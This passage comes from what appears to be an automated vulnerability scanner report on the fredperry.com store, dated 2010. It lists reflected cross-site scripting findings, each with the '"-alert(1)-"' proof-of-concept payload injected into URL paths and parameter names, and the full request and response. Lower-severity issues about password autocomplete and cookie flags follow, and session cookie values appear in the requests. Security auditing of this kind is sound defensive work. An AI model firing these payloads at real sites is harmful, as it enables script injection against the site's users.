Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:08:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v475frll84i348g101n8b65cs0; expires=Tue, 09-Nov-2010 17:08:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1");
//]]>
...[SNIP]...

1.282. https://www.fredperry.com/customer/account/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c3dc"-alert(1)-"76794ee1910 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer8c3dc"-alert(1)-"76794ee1910/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lig1hamq19vigkptie5smff0h3; expires=Tue, 09-Nov-2010 17:28:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer8c3dc"-alert(1)-"76794ee1910/account/");
//]]>
...[SNIP]...

1.283. https://www.fredperry.com/customer/account/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58371"-alert(1)-"854ac7c6992 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account58371"-alert(1)-"854ac7c6992/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=btgkebc10t2gjuigr3f5i4g5a6; expires=Tue, 09-Nov-2010 17:28:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account58371"-alert(1)-"854ac7c6992/");
//]]>
...[SNIP]...

1.284. https://www.fredperry.com/customer/account/login/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b84ec"-alert(1)-"731c73bbde8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customerb84ec"-alert(1)-"731c73bbde8/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=i750lfosl1s47pnanmg5inj6p2; expires=Tue, 09-Nov-2010 17:28:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customerb84ec"-alert(1)-"731c73bbde8/account/login/");
//]]>
...[SNIP]...

1.285. https://www.fredperry.com/customer/account/login/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61c53"-alert(1)-"5e56b29bc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account61c53"-alert(1)-"5e56b29bc4/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j89bi60c7faef84lhq7uka42e5; expires=Tue, 09-Nov-2010 17:28:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account61c53"-alert(1)-"5e56b29bc4/login/");
//]]>
...[SNIP]...

1.286. https://www.fredperry.com/customer/account/login/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e47f"-alert(1)-"623ae57ed21 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account/login1e47f"-alert(1)-"623ae57ed21/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t09b9es2tf5c0lopedavb2inm0; expires=Tue, 09-Nov-2010 17:29:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account/login1e47f"-alert(1)-"623ae57ed21/");
//]]>
...[SNIP]...

1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc2d"-alert(1)-"f9ade8fa6f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:27:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eckdao25lgvnp6vtl5hl6anr14; expires=Tue, 09-Nov-2010 17:27:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer/account/login/?ddc2d"-alert(1)-"f9ade8fa6f6=1");
//]]>
...[SNIP]...

1.288. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52c01"-alert(1)-"bf363aed77c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1 HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 18:41:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3pfqrlqdvcu228fqdlisdgne45; expires=Tue, 09-Nov-2010 19:41:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customer8c3dc%22-alert(1)-%2276794ee1910/account/?52c01"-alert(1)-"bf363aed77c=1");
//]]>
...[SNIP]...

1.289. https://www.fredperry.com/sales/order/history/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36d4e"-alert(1)-"4939634274c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales36d4e"-alert(1)-"4939634274c/order/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:28:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=utkl6i851mv1292i1u4cilrvo3; expires=Tue, 09-Nov-2010 17:28:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales36d4e"-alert(1)-"4939634274c/order/history/");
//]]>
...[SNIP]...

1.290. https://www.fredperry.com/sales/order/history/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc3d"-alert(1)-"9878bb43d9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales/order5fc3d"-alert(1)-"9878bb43d9f/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=loigkgvlq3rk860abto84uanr5; expires=Tue, 09-Nov-2010 17:29:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales/order5fc3d"-alert(1)-"9878bb43d9f/history/");
//]]>
...[SNIP]...

1.291. https://www.fredperry.com/sales/order/history/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /sales/order/history/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f660f"-alert(1)-"21f8a2e8aaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:29:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3kg62colr7hf79g2ki8eq19c01; expires=Tue, 09-Nov-2010 17:29:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sales/order/historyf660f"-alert(1)-"21f8a2e8aaf/");
//]]>
...[SNIP]...

2. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
</div>

<form action="https://www.fredperry.com/customer/account/loginPost/" method="post" id="login-form">
<fieldset class="col2-set login-page">
...[SNIP]...
<br />
<input name="login[password]" type="password" class="input-text required-entry validate-password" id="pass" title="Password" /><br />
...[SNIP]...

3. SSL cookie without secure flag set
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://www.fredperry.com/customer/account/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=d2mk5crl1cvamj39pbaqgfbh74; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.fredperry.com/customer/account/login/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3.2. https://www.fredperry.com/customer/account/login/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...

3.3. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

Summary

